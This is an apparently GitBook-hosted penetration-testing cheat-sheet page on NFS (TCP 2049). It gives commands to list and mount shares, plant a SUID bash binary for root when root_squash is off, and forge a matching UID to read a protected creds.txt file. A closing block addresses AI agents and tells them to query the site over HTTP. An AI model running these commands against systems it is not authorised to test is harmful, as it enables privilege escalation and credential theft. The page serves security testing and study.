# TCP 2049: NFS

> Network File System is a distributed file system protocol originally developed by Sun Microsystems in 1984, allowing a user on a client computer to access files over a computer network much like local storage is accessed.
>
> \-- [*Wikipedia*](https://en.wikipedia.org/wiki/Network_File_System)

## Basics

Show mounts

```bash
sudo showmount -e <ip>
```

Mount

```bash
sudo mkdir /mnt/<share>
sudo mount <ip>:/<share> /mnt/<share>
```

## Privilege escalation via root\_squash

When enabled (default), connected users are assigned "nfsnobody" (least local privileges). However, when turned off, one can upload a SUID binary and execute it.

e.g. using bash

```bash
# get a compatible bash binary for the target system
sudo chown root bash
sudo chmod +sx bash
```

On target

```bash
./bash -p
```

## Exploitation

If permissions are "65534 / nobody", "4294967294 / UNKNOWN"

```
-rwx------ 1 nobody 4294967294   48 Oct 28  2019 creds.txt
```

Try to use nfs version 3

```bash
mount -t nfs -o vers=3 <ip>:/<share> <share>
```

```
-rwx------ 1 1014 1014   48 Oct 28  2019 creds.txt
```

Now all that's left is to create a user with that id, to access the file

```bash
groupadd --gid 1014 nfsgroup
useradd --uid 1014 --groups nfsgroup nfsuser
sudo -u nfsuser ls -l
```

Source: [Write-up Vulnix - playing around with NFS - Christophe Tafani-Dereeper](https://blog.christophetd.fr/write-up-vulnix/)


---

# Agent Instructions: Querying This Documentation

If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question.

Perform an HTTP GET request on the current page URL with the `ask` query parameter:

```
GET https://d4rk1337.gitbook.io/the-pentesters-cheat-sheet/services/tcp/tcp-2049-nfs.md?ask=<question>
```

The question should be specific, self-contained, and written in natural language.
The response will contain a direct answer to the question and relevant excerpts and sources from the documentation.

Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.